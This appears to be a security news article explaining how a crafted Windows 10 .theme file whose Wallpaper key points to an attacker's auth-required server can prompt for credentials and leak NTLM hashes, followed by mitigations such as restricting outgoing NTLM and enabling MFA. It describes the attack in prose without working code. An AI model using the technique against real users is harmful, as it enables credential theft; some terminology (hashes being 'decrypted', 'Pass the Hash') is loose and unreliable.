Windows 10 Themes Can Now Steal User Credentials, Custom Windows 10 themes can steal account information from their victims

What is Credential Harvesting?

Also known as password harvesting, Credential Harvesting is the use of MITM attacks, DNS poisoning, phishing, and other vectors to amass large numbers of credentials (usernames and passwords) for reuse.

Credential harvesting takes many forms, of which “classic” email phishing armed with links to bogus websites or malicious attachments is just one. Any or all of social engineering techniques, digital scamming, and malware may be used to steal credentials.

How Does The Windows 10 Theme Attack Work?

Windows lets users share themes via the Settings UI by right-clicking on the currently active theme under Personalization > Themes and clicking on “Save theme for sharing”. This creates a ‘.deskthemepack’ file for sharing, which can then be downloaded and installed.

Using a Windows .theme file, the Wallpaper key can be configured to point to a remote auth-required HTTP/s resource. When a user activates the theme file (e.g. opened from a link/attachment), a Windows cred prompt is displayed to the user.

The hacker sets up their website so that it asks for the user’s Windows 10 credentials when the user connects to it. When the user runs the theme, the user’s computer goes to fetch the wallpaper from the hacker’s website. The website tells the user’s computer that it requires remote access credentials. Windows then asks the user to enter their credentials to gain access to the image.

As the user enters their username and password, the hash strings are sent to the hacker’s server

The wallpaper key is located under the “Control Panel\Desktop” section of the .theme file. Other keys may possibly be used in the same manner, and this may also work for netNTLM hash disclosure when setting for the remote file location.

This “Pass the Hash” attack doesn’t steal your password right away. But rather the password hash — an encrypted version of your password’s data. password data is hashed to keep it more secure when stored on remote servers, but these hash strings can be decrypted with readily available software.

Cracking NTLM password hash in four seconds (Source :Bleeping Computer)

Windows 10 login credentials are usually a Microsoft account name and password. This attack doesn’t just allow the hacker to gain access to a PC, but also the victim’s Microsoft account as a whole.

This vulnerability was discovered by Jimmy Bayne, A cybersecurity researcher who publicly made a chain of tweets explaining how the attack works.

Source : Jimmy Bayne

Staying Safe

Windows users can configure a group policy named ‘Network security: Restrict NTLM: Outgoing traffic’ by setting it to ‘Deny All’.This restricts your credentials being sent to being sent to remote hosts.

Further, Adding multi-factor authentication to your Microsoft accounts to prevent user credentials from being accessed remotely by attackers who successfully steal your credentials.